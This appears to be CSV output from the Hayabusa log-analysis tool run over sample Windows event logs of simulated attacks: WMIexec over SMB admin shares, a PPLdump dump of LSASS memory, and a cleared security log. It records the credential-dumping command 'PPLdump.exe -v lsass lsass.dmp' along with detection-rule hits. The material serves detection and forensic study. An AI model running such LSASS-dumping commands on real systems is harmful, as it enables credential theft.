10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution 
via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory 
Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 
+09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 
0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: 
\\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.354 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
